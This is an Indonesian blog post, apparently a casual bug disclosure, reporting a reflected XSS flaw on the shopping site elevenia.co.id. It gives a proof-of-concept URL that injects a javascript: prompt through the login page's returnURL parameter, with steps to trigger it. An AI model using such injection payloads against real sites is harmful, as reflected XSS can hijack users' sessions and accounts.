Reflected XSS on elevenia.co.id - Halo Guys, Balik lagi bersama saya :D. Pada artikel kali ini saya cuma mau share aja bahwa saya nemu xss di elevenia.co.id , yakni situs jual beli online di indonesia yang cukup banyak diketahui orang orang.
Jadi ceritanya w abis nonton film back to the future, nah terus ada iklan elevenia tuh. Karena w penasaran akhirnya w telusuri telusuri, dan nemu deh :''"V.
PoC
- Buka :
https://www.elevenia.co.id/login.do?isSSL=Y&returnURL=javascript:prompt(%27XSS BY ./z3rb0a%27);
- Kalau Belom Login Ya Login dulu Baru buka web itu.
- Bingo, alertnya muncul deh :D
![Fix / Patch Bug SQL injection [ Protect Website From Hacker ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbyKAmzSEKHktv_wzQx4m7_e0_nSYU853qO7c62v8OfVYUjoTbdhRAFkaBtZjnFw8tB5Yhkn3a2AYyHMvK6ukSyYyFx7lHxCR8O-h3k6tj8Z_pXFcNFmjngMoJsdYlPXzUzbuGqe97opD/s72-c/sqli.jpg "Fix / Patch Bug SQL injection [ Protect Website From Hacker ]")
![[BUGBOUNTY] Able to see everyone original url on ADFLY](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-hSEPdoum7hkh1Db8ffKuMaHzBJ_PKtbZZeiSbuhu7hxhk9nPHLi4eMHZVkkc27EAA1dmfXgvzOPvoQIAbNA4yZlkKtgxzEB4jnTUjIz2n6HSyFgB3ffU4_rqv7es6oRbsd3VuqNI_G6N/s72-c/adfly.jpg "[BUGBOUNTY] Able to see everyone original url on ADFLY")
1 comments: